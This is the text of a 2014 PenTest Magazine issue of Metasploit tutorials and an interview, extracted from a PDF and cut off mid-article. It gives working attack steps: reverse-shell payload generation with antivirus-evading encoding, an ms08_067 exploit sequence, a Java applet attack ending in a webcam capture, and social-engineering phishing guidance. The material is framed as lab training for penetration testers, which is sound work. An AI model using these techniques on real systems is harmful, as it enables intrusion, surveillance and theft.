You are on page 1of 78

Cyber Security Auditing Software
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and frewall devices. Any security issues identifed within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
Although various tools exist that can
examine some elements of a configuration,
the assessment would typically end up
being a largely manual process. Nipper
Studio is a tool that enables penetration
testers, and non-security professionals, to
quickly perform a detailed analysis of
network infrastructure devices. Nipper
Studio does this by examining the actual
configuration of the device, enabling a much
more comprehensive and precise audit than
a scanner could ever achieve.
Ian has been working with leading global
organizations and government agencies to
help improve computer security for more
than a decade.
He has been accredited by CESG for his security and
team leading expertise for over 5 years. In 2009 Ian
Whiting founded Titania with the aim of producing
security auditing software products that can be used by
non-security specialists and provide the detailed
analysis that traditionally only an experienced
penetration tester could achieve. Today Titanias
products are used in over 40 countries by government
and military agencies, financial institutions,
telecommunications companies, national infrastructure
organizations and auditing companies, to help them
secure critical systems.
With Nipper Studio penetration testers can be experts in
every device that the software supports, giving them the
ability to identify device, version and configuration
specific issues without having to manually reference
multiple sources of information. With support for around
100 firewalls, routers, switches and other infrastructure
devices, you can speed up the audit process without
compromising the detail.
You can customize the audit policy for your customers
specific requirements (e.g. password policy), audit the
device to that policy and then create the report detailing
the issues identified. The reports can include device
specific mitigation actions and be customized with your
own companies styling. Each report can then be saved
in a variety of formats for management of the issues.
Why not see for yourself, evaluate for
free at
Copyright 2014 Hakin9 Media Sp. z o.o. SK
Introduction to Metasploit
By Manasdeep
Get general information about Metasploit functions. The author gives answers to main questions
about Metasploit and describes methodology for running it.
Hacking Hands-on
By Jordan M. Bonagura
If you want to know how to hack the system but this is a new field for you, the article give you
simple and easy way to become professional.
How to Hack Windows in 5 minutes
By Rafael Fontes Souza
Step-by-step guide on how to exploit Microsoft Windows 8. Graphical images will help you easy
understand each step! Like a BONUS an author gave an interview. You can check it below the article!
Metasploit and Penetration Testing
By Maher Abdelshkour
Everything you need to know about Metasploit is in one article. Find out general facts and
commands about Metasploit to bacome a professional pentester!
Multiphase Penetration Testing: Using BackTrack Linux, Metasploit, and
By Lance Cleghorn
A clear description of each phase of pentesting for those who wants to find out about common
attacks. Easy, simple and understandable!
Pentesting Windows using Metasploit Framework
By Omkar Prakash Joshi
The article will demonstrate all attacks in virtual environment. Learn how to create security tools
and exploits through Metasploit Framework.
Metasploit for Exploits Development: the Tools Inside the Framework
By Guglielmo Scaiola
Graphical interpretation of the attack. The author will show you how you can take advantage of
the framework and how easy it it is to use it!
Pentesting with Metasploit Pro
By Cristian Stoica
Get to know additional features of Metasploit and pro version of it. Go through the whole process
from running a penetration test to writing a report.
HeartBleed Bug Exploiting with Metasploit
By Alessandro Parisi
Author shows the nature of Heartbleed Bug and its impact on a server. Become aware of possible
damage to prevent from it!
Exploit a Vulnerability with Metasploit
By Azza Nafti
Explore Metasploit and security volnerability in brief. The author gives you a small example to
show theory through practice.
Dear PenTest Subscribers,
e are proud to present a brand new Pentest Magazine, as you might have already noticed, we upgraded
our webiste, we are going to improve a lot things, because we are changing for you.
In new issue, we are highliting secrets of Metasploit. If you ever think about, how to hack in Windows in
5 minutes, youll get an answer. In this article everybody is going to understand techniques of exploiting
the operating system Microsoft Windows 8 and Windows 7 SP 1, of course only for teaching purposes, for
network administrators and security specialists understand how the mind works and to prevent the attacker.
Our authorities had prepared a set of features explaining the types of the Metasploit attacks, and ideas how
prevent being hacked. You will get know everything about pentesting with Metasploit Pro, tools inside the
framework, heartbleed bug exploiting with Metasploit. You will find out about Multiphase Penetration
Testing: Using BackTrack Linux, Metasploit, and Armitage.
We are sure that you will like work with Metasploit, we gave much effort for you to explain everything step
by step.
Best wishes from PenTest Magazine
Editor in Chief: Milena Bobrowska
Managing Editor: Milena Bobrowska
Editorial Advisory Board: Jeff Weaver, Rebecca Wynn
Betatesters & Proofreaders: Abishek Kar, Phil Patrick,
Steven Wierckx, Krishore PV, Tim Thorniley, Tom Updegrove,
Elia Pinto, Brandon Dixon, Ivan Gutierrez Agramont, Sandesh
Kumar, Pradeep Mishra, Amit Chugh, Johnette Moody, Steven
Hodge, Micha Stawieraj, Kashif Aftab, Jeff Smith, Jordi
Rubio, Mardian Gunawan, Arnoud Tijssen, David Kosorok,
Mbella Ekoume, Viswa Prakash, Michal Jahim.
Special Thanks to the Beta testers and Proofreaders who helped
us with this issue. Without their assistance there would not be
a PenTest magazine.
Senior Consultant/Publisher: Pawel Marciniak
CEO: Ewa Dudzic
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski
Publisher: Hakin9 Media Sp. z o.o. SK
02-676 Warsaw, Poland
ul. Postepu 17D
Phone: 1 917 338 3631
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
The techniques described in our articles may only be
used in private, local networks. The editors hold no
responsibility for misuse of the presented techniques
or consequent data loss. > 877.UAT.GEEK
You can talk the talk.
Can you walk the walk?
Advancing Computer Science
Artifcial Life Programming
Digital Media
Digital Video
Enterprise Software Development
Game Art and Animation
Game Design
Game Programming
Human-Computer Interaction
Network Engineering
Network Security
Open Source Technologies
Robotics and Embedded Systems
Serious Game and Simulation
Strategic Technology Development
Technology Forensics
Technology Product Design
Technology Studies
Virtual Modeling and Design
Web and Social Media Technologies
Please see for the latest information about
degree program performance, placement and costs.
Introduction to Metasploit
by Manasdeep
Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.
It provides end to end framework for penetration testing for:
Information gathering
Vulnerability Scanning
Pre Exploitation
Post Exploitation
Exploit Development
Metasploit greatest advantage is that it is open source and freely extendable. You can customize it by
including your exploit and payloads as per your need. A security pentester can check the custom made
applications specific to an enterprise against his customized exploits and payloads. If a security researcher
crafts a new attack, then a custom made payload can carry out most of the attack purpose.
Today, software vulnerability advisories are often accompanied by a third party Metasploit exploit module
that highlights the exploitability, risk, and remediation of that particular bug.
Architecture of Metasploit
For the sake of simplicity, we shall concentrate only on the Interface and the module part of Metasploit for
this article.
Platform Used for demonstration
We are currently demonstrating Metasploit features with the help of Backtrack OS. All screen shots of working
of metasploit are taken from there. We have VMware image of Backtrack 5 R1 OS with this configuration:
We login in Backtrack 5 R1 OS with credentials as root and password as toor. Type startx to load the GUI
screen of Backtrack.5.
Metasploit is typically found on this location in Backtrack OS.
Metasploit Interfaces
Msfconsole: The console and the most powerful of all interfaces. Can support multiple sessions
Msfcli: Single command interface. Supports only one session
Msfd: Provides a network based interface to msfconsole
Msfweb: This is web based interface.
Good Practices for using Metasploit
Updating via Msfupdate
It is always beneficial to have updated Metasploit framework before beginning to work on it. This way we
can stay current for all the exploits and payloads offered for the framework.We use the Msfupdate utility to
update the Metasploit framework.
Here is the path for the Msfupdate utility:
Port scanning via Nmap
It is good idea to identify the open ports and the services running on them using a versatile tool such as
nmap. It gives us the clearer picture on what areas and ports we need to focus our energy to run the exploit.
Knowing the service version number helps us greatly to select the known exploits available in Metasploit
with their associated payloads.
Here is an example of the nmap scan:
Meterpreter: Metasploits Payload
A payload is the piece of software that lets you control a computer system after its been exploited. It is
typically attached to the exploit. Meterpreter is the best known payload of Metasploit. Meterpreter enables
users to control the screen of a device using VNC and to browse, upload and download files.
What typically payloads allow you to do after execution of exploit?
Add a new user to victim machine
Opening the command prompt on a specifc port of victim system and running the commands from there
Reverse connecting a command shell to issue the commands from your end
What is a meterpreter?
Meterpreter is short form for Metasploit Interpreter which is a powerful payload allowing you to do many
things on the compromised system such as manipulating local files in system etc. Used for write and execute
advanced commands on the default shell of the victim system.
What makes Meterpreter so powerful?
Meterpreter runs in memory of the exploited process which makes it very quiet and stealthy to evade
detection by the antivirus and other analysis tools. It leaves very small traces in the compromised system
while in turn giving the attacker maximum space to carry out activities such as navigating local file system,
port forwarding, tunnel connection from victim machine to other system, push entries in registry, modify
network configuration, download confidential files etc. In short, once you get the meterpreter running you
can pretty much do anything related to a hacked system.
How this is achieved?
Meterpreter achieves this by providing API on which programmers can write their specific extensions which
can be uploaded as shared DLLs running within the memory of the exploited process.
How this is helpful to pentesters?
Metasploit using meterpreter avoids executing a new process or sub-process and maintains the stealth-ness
of the attack. It comes with built-in commands and extensions that allow obtaining system information,
configuring port forwarding, as well as uploading and executing binaries and DLLs. It basically evades
detection largely by any analysis tool.
Running Metasploit
This is the path for running metasploit from backtrack OS.
Once started, we get the msfconsole as follows:
Methodology for running an exploit from msfconsole commands
show exploits: This command will give you the extensive list of the exploit available in Metasploit.
use <exploit name>: Using the exploit for your victim machine
show payloads: Gives out the name list of available payloads specifc to exploit chosen.
set PAYLOAD <payload>: Sets the payload which is actually executed after successful execution of your chosen exploit.
show OPTIONS: Lists out the options such as RHOST, TARGET followed by its value associated with the
selected exploit and payload.
exploit: Executes the Exploit against target (victims) system
If exploit executes successfully, then the payload embedded in it is injected into the victim machine to carry
out the intended activity. If unsuccessful, then corresponding error message is shown.
Many times during payload execution, we come across bad characters such as Null (0X00) byte, new line
characters which can be trapped by built in application which uses sanitization filters on received input.
This utility helps us to encode the exploit and get rid of bad characters to bypass those input filters. It also
significantly reduces the dangers of being caught by IDS tool.
Suppose we are producing meterpreter executable met.exe as follows: Code:
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /var/www/met -.exe
Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=,LPORT=4444
Now, when we try to download this file from the victim PC, we get an error message because our antivirus
has detected an intrusion attempt. Let us see what happens when we apply the encoding techniques: Code:
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | ./msfencode -
-t exe > /var/www/metenc1.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
Notice the size of the file changed from Length: 290 to size 318. The text marked in blue shows us that the
attack has been successful.
How does it help the pentester?
Pentester has more control and flexibility for crafting his payloads and sent them across its target. He can
now demonstrate more creativity to encapsulate his payloads for delivering to destination host machine to
achieve its exploits objective.
Automating the Pentest
We can completely automate a pen-test from scanning remote systems to identify vulnerabilities, and then
launch exploits against these systems.
We have the following options to import reconnaissance data:
db_import_nessus_nbe: Import an existing Nessus NBE output fle
db_import_nmap_xmlI: Import data from an existing Nmap XML output fle
db_nmap: Execute Nmap through the framework and store its results in the database
The command db_autopwn, references the reconnaissance data, links it up with matching exploit modules,
selects exploit modules based on open ports and launches the exploit modules against the matched targets.
Using db_autopwn
Auxiliary Module system
The Auxiliary module system is a collection of exploits and modules that add to the core capability of
the framework. They are basically suited for information gathering purposes. These are automated scripts
performing a certain task. We can specify single or multiple ranges to be targeted. Popular uses are in port
scanning, fuzzers, DoS scripts etc.
Popular Auxillary Modules
scanner/smb/version: Determine the operating system version and service pack level of a Windows target
system using SMB fngerprinting. Use info for more information
scanner/discovery/sweep_udp: Scans a single host or a specifed range of hosts for UDP services, and
decodes the results. Eg.

Searching Auxiliary modules:
We can narrow down our search to a few modules when using search operator. E.g.. Search all modules with
How it is helpful to pentesters?
The auxiliary module system allows excellent information gathering activities, matching systems to
available exploits, executing exploits, managing the multiple exploit sessions, and storing all of this
information in a database.
Social Engineer Toolkit
This toolkit was created to fill the gap between the penetration testers and social engineering. This helps
tremendously to craft a clever malicious file to trap innocent users to click on it. The interface is very simple
to use. Just select the option no in the menu and we are good to go!
We can access the SET took kit as follows:
We are greeted with SET toolkit splash screen as:
Now in this menu driven program, all we have to do is select our attack vector, craft it as per instruction
and send the link / email to the user. The innocent user when opens the link or attachment falls victim to our
social engineering tricks and we have easy access to his system.
We can try all the options in the SET toolkit menu and follow the instructions accordingly to launch a
successful attack t compromise the victim machine.
How this is helpful to pentesters?
Pentesters can now readily demonstrate to management how an attacker with malicious intent can abuse the
trust of the people of the organization to gain access to the most sensitive information. By exploiting and
presenting the real world tests on phishing, it can be shown that social engineering is the strongest threat to
the organization. Its target is people, not the systems to gain access to confidentiality.
General Precautions for using Metasploit
Metasploit is no doubt a very powerful and handy tool for an effective and thorough penetration and exploit
testing. But if used improperly, may result in very unpleasant situations where whole server might be forced
to shut down during testing costing millions to an organization. Here are some good practices to follow
whenever we are going for penetration and exploit testing.
a. Proper backup: It is highly recommended that the backups must be taken before any penetration exercise
is undertaken, else the loss of information and its unavailability for the time being might prove fatal to
business if in case something goes wrong. It works as a second line of defense.
b. Prior management approval: It is crucial that proper written authorization letter is obtained from
management before proceeding for any exploit testing. This removes the burden of facing any legal
lawsuits if in case things go wrong.
c. Inform frst, and then exploit: The good rule of thumb is to inform the senior management about the risk
and ask their call on the issue. If you receive green signal to proceed with the exploitation part, obtain
written approval and then demonstrate.
d. Training: Security awareness is the strongest deterrent for any risk for valuable information leakage.
Through the live demonstration of SET inform the IT and other offce staff how to stay on guard by not
falling victim to the social engineering methods.
Metasploit is helpful in determining if the given vulnerability is actually exploitable or not. It lets us know if
there actually a risk associated with the vulnerability which can be exploited. This automatically cleans out
any instances of false positive which are typical feature of many automated scanners. Automated scanners
dont tell you if vulnerability is a potential risk or not as they dont check that against a known exploit. But
metasploit does that. Hence, a better risk assessment judgment can be made using metasploit.
Metasploit can also be frequently used by pentesters to demonstrate successfully the potential extent of
damages that an attacker is capable of after successful break-in by or post exploitation activities. This can
also help us to better rate the severity of the risks associated with the discovered vulnerability of the system.
Metasploit Toolkit for Penetration Testing by David Maynor
Metasploit: The Penetration Testers Guide by David Kennedy
Hacking Hands-on
by Jordan M. Bonagura
When I have decided to write this article, I thought of working with a model without a lot of
theory and much more hands-on. The goal is to write for an audience of beginners who want
to know how to hack a system, but dont have any idea how to do it.
Im sure that usual article must have all technical stuff to prove why its possible and more than that,to teach
what happens in each step, but in this case I chose to write something for that guy that wants to hack for the
first time, so, in my opinion, this guy can be motivated to learn more and more and start to discover a new
hacking world.
I have to emphasize here the importance that any kind of test should be perfoming in your own environment
with your virtual machines and always for ethical purposes.
So, lets talk about our environment: Well use 2 different virtual machines that will have these
configurations bellow:
O.S. IP Address
Windows XP
With the right environment, we can go to the next step.
Using the Backtrack machine, we can start the Metasploit application using the msfconsole command.
Before we start to hack, we can see some interesting commands, for example the version that we are using
with the version command in the metasploit prompt, and get some help with help command.
Figure 1. Help msfconsole
To see the exploits and know more about each one, you can run the show exploits command inside the
metasploit prompt.
Figure 2. Show exploits command msfconsole
Environment 1 Windows XP
info windows/smb/ms08_067 use windows/smb/ms08_067 show options
set RHOST set target 0
set PAYLOAD windows/meterpreter/reverse_tcp set LHOST
check exploit
Figure 3. Info command msfconsole
Figure 4. Show options command msfconsole
After running the exploit there will be an open session where you can type the pwd command and check what
that you are inside the C:\Windows\System32, another command that can be used is sysinfo to show you
detailed informations about the O.S.
Now that youve learned how to hack the Windows XP, you need to go deeper and begin to understand
how these exploits really works and how they use technical skills to explore vulnerabilities. You can try to
understand some concepts of computer networks and operating systems too.
Remember only studying concepts you will be really able to succeed in your hacking strategies.
In my next article I will show how to explore a Linux O.S. using metasploit.
About the Author
CEO Hades Coding
Consultant and Researcher in Information Security / CEH
Stay Safe Podcast Founder
Computer Scientist
Post Graduated in Business Strategic Management, Innovation and Teaching
Founder Vale Security Conference Brazilian Conference
Consultant Member Brazilian Comission of High Tech Crime (OAB / SP)
Coordinator and Teacher in IT area
SJC Hacker Space President
Speaker (CNASI, AppSec California, H2HC, Angeles Y Demonios, Silver Bullet,
Seginfo, ITA, INPE, etc)
How to Hack Windows in 5 minutes
by Rafael Fontes Souza (CISO of HackersOnlineClub)
Readers, in this article everybody is going to understand techniques of exploiting
the operating system Microsoft Windows 8 (only for teaching purposes, for network
administrators and security specialists understand how the mind works and to prevent the
attacker). Through the Metasploit you will learn how to hack some machines with Windows
OS vulnerable, Windows 7 SP1. Other OS is also applicable.
This exploit works using Java Signed Applet Method on any browser, but requires the java plugin
installed, a file is created. Jar, it is necessary that the target open a URL and allow the java applet to run
in the browser. The applet is presented to the target through a web page. The Java Virtual Machine, of the
victim will pop up a window asking if they trust the signed applet, after the victim clicks on run the applet
is run with full permissions.
Step By Step
Requirements for pentest:
1. You must have installed the Windows 8 operating system.
2. Some target computer or VMware (Virtual Machine) with a Linux distribution, can be Backtrack or Kali,
whatever, the important thing is to have the metasploit up and running.
First, you need to open the terminal and enter the command:
Figure 1. Open metasploit
After, we choose the exploit to use:
Lets type use exploit/multi/browser/java_signed_applet.
Press enter and type Show options.
Figure 2. Use exploit and show options
Essential concepts
The SRVHOST and SRVPORT have defined default values and 8080. The SRVHOST is the IP
address that the server will work to make the connection url to be opened by the target browser. SRVHOST
is set to, the target must be able to connect to this machine using your public ip.
Figure 3. Set payload
The LHOST should be the IP address that the victim is connected.
Figure 4. LHOST and exploit
When the target open this link on your browser displays a warning in a dialog box.
A window will open, and the victim can check the I accept the risk and want to run this application, click Run.
Figure 5. Java applet
Therefore, after the victim opens the malicious URL, then click Run, Metasploit will start a meterpreter
session to the target machine, and you get full access!
You can directly run sessions l to see the active sessions. Example: sessions-i 1, where 1 is the ID of the
session. The applet is able to connect to Metasploit.
Meterpreter session starts and is ready, as planned, and available options for you to exploit the system.
Figure 6. Session starts
This article is only for ethical hacking, now you can have fun with the commands.
Figure 7. Webcam shot: Just 4 fun
About the Authors
Rafael Fontes Souza
Rafael Fontes Souza is Chief Information Security Officer of HOC and Business Partner at Voice of Green Hats
Company, good communication in groups and the general public, started studying with thirteen years(SQL
database), have extensive experience in operating systems such as Linux, UNIX, and Windows. He is member of
French Backtrack Team, in the project Backtrack Team made partnerships with groups from France, Indonesia
and Algeria, was prepared a collection of video lessons and made available on the website. Founder of Wikileaks
and Intelligence, actively help to increase the safety and develop softwares for HackersOnlineClub(Indian),
contributes to magazines and websites from countries like Poland, Pakistan, USA and others.
Ziaullah Mirza
Ziaullah Mirza (founder Voice of Green Hats) is a mature and an enthusiastic individual who believes
in snaking up my ladder with honesty and hard work. He possesses a strong personality, excellent
communication and interpersonal skills. He has equipped with the ability to respond to queries,
manipulating problems analytically, to assess situation and then resolve the problem quickly and
professionally. He is a highly motivated, eager to learn and able to work under busy/stressful conditions
to be one of the leading roles within the organization. In the view of new technology and competitiveness
in educational market and sustainability of job market.
(Owner: VOICE OF GREEN HATS) AND RAFAEL FONTES SOUZA (Chief Information Security Ofcer)
What kind of vacancies do you have for penetration testers? For which kind of projects?
We normally hire Ethical Hacks/ security professional for Cyber Security projects. Project nature could be
for Pen-testing cyber tools in order to deploy for educational institutional. Some project related to reverse
Engineering of viruses or Trojans in order to find the reality and inside of it.
How many penetration testers does your company hire? Do you look for them ongoing?
As we hire for period of projects so a number of pen-testers are required may vary, sometimes 10 to 50 and
sometimes this amount is only 2 to 3 individuals
How does you recruitment process look like?
It is quiet clear and open for those who are interlinked with our forums or network. To evaluate whole
process with a team of experienced and highly qualified people but we always try our best to make set.
What certications are required, what certications are a plus
As you know Voice of Green Hats is training and solutions provider so we always look for those guys
who are certified by Voice of Green Hats so we normally look for certificate like Executive Certificate in
Cyber Security ECCS.
What are the characteristics or traits of the top testers you have at the moment?
They are highly qualified and best performers in their tasks. They have experience for International projects
in Pen-testing and have been awarded accordingly.
If I were to ask your pentesters about working for your company what would they say?
I am confident, they will respond in a positive way as they are working as professional environment with life
entertaining facilities as well. Working with Voice of Green Hats VOGHs is not as strict as you have to
present yourself physically in office. They can choose the way how they are going to perform the task easily.
Sometimes people need their selected environment that we might not able to provide etc as long as project is
done professionally and perfectly.
What is the average tenure of the testers working here?
As I said, it always depends on the project they are working on. Sometimes it is short like weeks or
sometimes it is years.
What is the strategic direction of the company? How you involve testers in this strategy?
Strategic direction is one of trade secret for us. As the founder of Voice of Green Hats I keep this secret
with me. But as you questioned here I would like to tell the main tool that is CI Competitive Intelligence.
You can also get this experience by taking ECCS course or one of our certificate related to CI. I am sure, you
will not divert you direction thinking I do strategic marketing of my certification here in Interviews.
What value can pentesters lend to the strategic mission of the company?
They are all working on the directions given by project manager or project directors. But key structure of
strategic approach is unidirectional and that is where I am watching it.
What is the greatest challenge pentesters face in your company?
Have you ever closed your look at the law enforcement organizations around the world, they are all backed
by Governments, agencies etc. with all facilities of life and payment to make them work more hardware as
well as encouragement to work diligently. But our pentesters only have payment of work they do. I cannot
encourage them as good as governments do. But I still try my best.
What makes your company superior to your competitors?
Our work speaks for itself, we dont compete anyone in the Cyber World, that is what makes us superior to
all those who consider themselves our competitors.
How do you attract TOP pentesters?
Our name brings them to us.
Hi, thanks for giving me your time. Please introduce yourself to our Readers.
A: Hey Guys, My name is Rafael Fontes Souza, I am the CISO of HackersOnlineClub, Founder of the
Wikileaks, and Intelligence and now partnership with Voice of Green Hats Company, my main interests
include Cryptography, Security Research, Penetration Testing. In my free time I like to write for websites
and magazines where I can have the opportunity to convey my knowledge.
Rafael, tell me more about your partnership with Voice of Green Hats?
I am currently writing a book on cryptography (since the most advanced quantum and classical techniques)
and we plan to turn into a certification...
What are the biggest challenges that the eld of information security is suffering from?
It is known that a lot of espionage occurs by some governments and also by competitors, they should
remember that privacy is important, encryption is a positive and honest way to protect sensitive data, if there
is no respect between nations cyber war can be the scenario.
What advice would you suggest to new Hackers?
Be humble and always seek to study and seek help from the more experienced; make the right choice
wherever you are, act ethically.
Metasploit and Penetration Testing
by Maher Abdelshkour
When you ask about Penetration Testing tool the first thing that comes to my mind is the
worlds largest Ruby project, with over 700,000 lines of code Metasploit. So what exactly
is metasploit?
In this article, you will learn about the following
What is Metasploit
Metasploit Terms and Defnitions
what is msfpayload
Important Metasploit Commands
Metasplot Reliability rankings
Penetration Test LAB
Who should read this article?
This article would be essential to any industry that has to test regularly as part of compliance requirements or reg-
ularly tests their security infrastructure as part of healthy security practices.
Penetration testers
Vulnerability assessment personnel
General security engineers
Security researchers
A basic understanding of computer fundamentals such as the command line, networking, and TCP/IP
networking would be helpful. The requirements would be the same as for SANS 560.
Metasploit is a framework used for storing, deploying, and creating exploits. An exploit is a piece of code
which can interact with other programs to let the attacker (you) execute bits of code on the victims computer.
It also has a wonderful tool known as msfpayload. The framework includes hundreds of working remote
exploits for a variety of platforms. You can mix and match payloads, encoders, and NOP slide generators
with exploit modules to solve almost any exploit-related task.
A penetration tester simulates an attack on a customers network by trying to find a way inside. Many such
attacks begin using a scanning tool, such as NeXpose, Nessus, or Nmap, to look for network vulnerabilities;
however, several of the leading Intrusion Detection/Protection systems are capable of alerting the network
owner when a scan is in process. Rather than scanning for an open port, a devious alternative is to email a
payload to the victim that will allow the attacker to establish a foothold on the victims network.
By following this article, youll evaluate your security posture using the same process skilled attackers
follow. Youll learn how to perform reconnaissance, exploit hosts and maneuver deeper into your network.
But before proceeding, I want to let you know some Metasploit Terms and Definitions.
Exploit to take advantage of a security flaw within a system, network, or application.
Payload is code that our victim computer to execute by the metasploit framework.
Module a small piece of code that can be added to the metasploit framework to execute an attack.
Shellcode a small piece of code used as a payload.
What is msfpayload?
msf payload is used in conjunction with msfcli and msfenocde. Together, they are a set of tools which creates
a file that connects back to your computer, encodes the file, and sets up a listener for said file. This method
completely bypasses the need for exploits, but requires social engineering skills to somehow get your file on
their computer and for them to execute it. (or just sneak a flash drive in while their not looking and execute
it for them, but I dont recommend that.) Sounds great right? A skilled intruder who delivers a payload to
your network in the form of an email message will want to make sure the payload can evade detection by
antivirus software. Most antivirus software vendors use a signature base to identify malicious code. To avoid
antivirus detection, an intruder must devise a payload that will not match the available antivirus signatures.
Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch
attacks, creating listeners, and much, much more. We will be using Msfconsole throughout these tutorials,
but mastering it will allow you to keep up with metaspolits rapidly changing framework. Metasploit comes
installed by default on backtrack 5. To access msfconsole, open your console and type:
root@bt: ~# cd /opt/framework3/msf3/
root@bt: ~#/opt/framework3/msf3# msfconsole
Msfcli is another way to access the metasploit framework but focuses more on scripting and interpretability
with other console-based tools. To view the msfcli help type:
root@bt:~# cd /opt/framework3/msf3
root@bt:~# msfcli h
Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are
some of the commands that you will use most.
Command Usage
search Typing in the command search along with the keyword lists out the various possible exploits that have that
keyword pattern.
show exploits Typing in the command show exploits lists out the currently available exploits. There are remote exploits for
various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the
flexibility and understand the working of Metasploit.
show payloads With the same show command, we can also list the payloads available. We can use a show payloads to list
the payloads.
show options Typing in the command show options will show you options that you have set and possibly ones that you
might have forgotten to set. Each exploit and payload comes with its own options that you can set.
info If you want specific information on an exploit or payload, you are able to use the info command. Lets say we
want to get complete info of the payload winbind. We can use info payload winbind.
use This command tells Metasploit to use the exploit with the specified name
set RHOST This command will instruct Metasploit to target the specified remote host.
set RPORT This command sets the port that Metasploit will connect to on the remote host.
set PAYLOAD This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.
set LPORT This command sets the port number that the payload will open on the server when an exploit is exploited. It is
important that this port number be a port that can be opened on the server ( is not in use by another service
and not reserved for administrative use), so set it to a random 4 digit number greater than 1024, and you should
be fine. Youll have to change the number each time you successfully exploit a service as well.
exploit Actually exploits the service. Another version of exploit, rexploit reloads your exploit code and then executes
the exploit. This allows you to try minor changes to your exploit code without restarting the console
help The help command will give you basic information of all the commands that are not listed out here.
Understanding Metasploit reliability rankings
As part of Metasploits rigorous 3-step quality assurance process, we rank exploits by reliability. Knowing
the ins-and-outs of the rankings protects the stability of the systems so your IT operations buddies remain
happy bunnies. Each Metasploit exploit, and indeed each module, is classified according to five reliability
levels. Modules include exploits as well as auxiliary modules, such as brute forcing modules, and payloads.
Understanding the reliability rankings is key to safely test production systems.
Vulnerabilities are unintentional APIs
Vulnerabilities are APIs that werent entirely intended by the developer. They hey are also undocumented
and unsupported. Some of these vulnerabilities are exploited more reliably than others, and there are
essentially three vectors to rank them:
Exploit success rate: Some exploits will get you a session every time. Others are more hit-and-miss, or
they may only work on the frst try but not the second.
Target system stability: Other exploits can get you a session but the process makes the system unstable.
Think of a denial of service module as an extreme case of this vector.
Fingerprinting: Does the exploit reliably fngerprint the target system to ensure that it only works on
tested target systems? Using an exploit on the wrong system can potentially destabilize the target system.
Only use exploit modules with a reliability ranking of Excellent or Great on production systems: You read
the blog post you know why!
Communicate with IT operations: Use only Before testing on production systems, it may be a good idea
to talk to the application owners ahead of time to ensure that theyre aware, buy into the process, and alert
you if anything has gone awry.
Test during maintenance windows: To play it extra safe, conduct your penetration test during offcial
maintenance windows. We recommend not testing systems that are being serviced since this will make
troubleshooting more diffcult.
Use the Audit Report to analyze situations: Of course, production systems can also go down without your
having had any part in it. To protect you from unwarranted allegations, use the audit report in Metasploit
Express or Metasploit Pro to prove when you did and did not touch certain systems.
Throw the kitchen sink at test systems: Testing only with 4 and 5 star modules is great for production
but less reliable vulnerabilities can still let a malicious attacker in who doesnt care about target system
stability. If you have a test system that mirrors your production environment, throw everything youve got
at it to cast a wider net. We still recommend also testing production it may not be a perfect image of your
test environment.
Now that we have the basics of Metasploit concepts and commands down, lets hack a system!
Lab Setup
Victim Machine
OS: Windows XP SP2 Operating System
Attacker (Our) Machine
OS: Ubuntu 14.04 TLS 32-bit OR Backtrack 5 R3
Metasploit Version: 4.7
Download and Installation
The first step in our process is to download and install Metasploit. Although there is a Windows version,
I will focus on the Linux version because of its greater flexibility and capability. Lets walk through the
download and installation on my favorite Linux distro, Ubuntu.
To install the latest version of the Metasploit 4.7 Framework (MSF4.7) on Ubuntu 14.04 use the following
commands. This downloads and installs the generic Linux binary which comes bundled with all the
necessary components you need for Metasploit to install and run. This should work for most users and is the
easiest and quickest way to get the Metasploit Framework running under Ubuntu and other Debian-based
Linux distros.
First open a terminal window and type:
If youre installing on a 64-bit build of Ubuntu, use this instead:
This downloads the current version of the Metasploit framework via wget.
Before you can run the installer, you need to make it executable. In the terminal, you must change the mode
to execute (x) for Metasploit:
chmod +x
And now execute the installer by getting root privileges by typing sudo and ./ with the name of our package:
sudo ./
Be patient now; it will take Metasploit a few minutes to install and build your database. After its done, you
are ready to run Metasploit. Simply type:
Now lets install WebSploit Toolkit
First download WebSploit toolkit from
Now unzip the fle folder and copied WebSploit V.2.0.5 Toolkit in the directory web under pentest
Now change the permission of WebSploit fle in WebSploit folder. Right click on websploit fle and select
Select the Permission tab and click on Allow executing file as program now click on close.
Configuring Metasploit on Windows
Installation of the Metasploit framework on Windows is simple and requires almost no effort. The framework
installer can be downloaded from the Metasploit official website ( In this
article, we will learn how to configure Metasploit on the Windows operating system.
You will notice that there are two types of installer available for Windows. It is recommended to download
the complete installer of the Metasploit framework, which contains the console and all other relevant
dependencies, along with the database and runtime setup. In case you already have a configured database
that you want to use for the framework as well,
Then you can go for the mini installer of the framework, which only installs the console and dependencies.
Once you have completed downloading the installer, simply run it and sit back. It will automatically install
all the relevant components and set up the database for you. Once the installation is complete, you can access
the framework through various shortcuts created by the installer.
You will find that the installer has created lots of shortcuts for you. Most of the things are click-and-go in
a Windows environment. Some of the options you will find are Metasploit web, cmd console, Metasploit
update, and so on.
Installing Metasploit with BackTrack 5 R3
BackTrack is the most popular operating system for security professionals for two reasons. First, it has
all the popular penetration testing tools preinstalled in it, so it reduces the cost of a separate installation.
Secondly, it is a Linux-based operating system, which makes it less
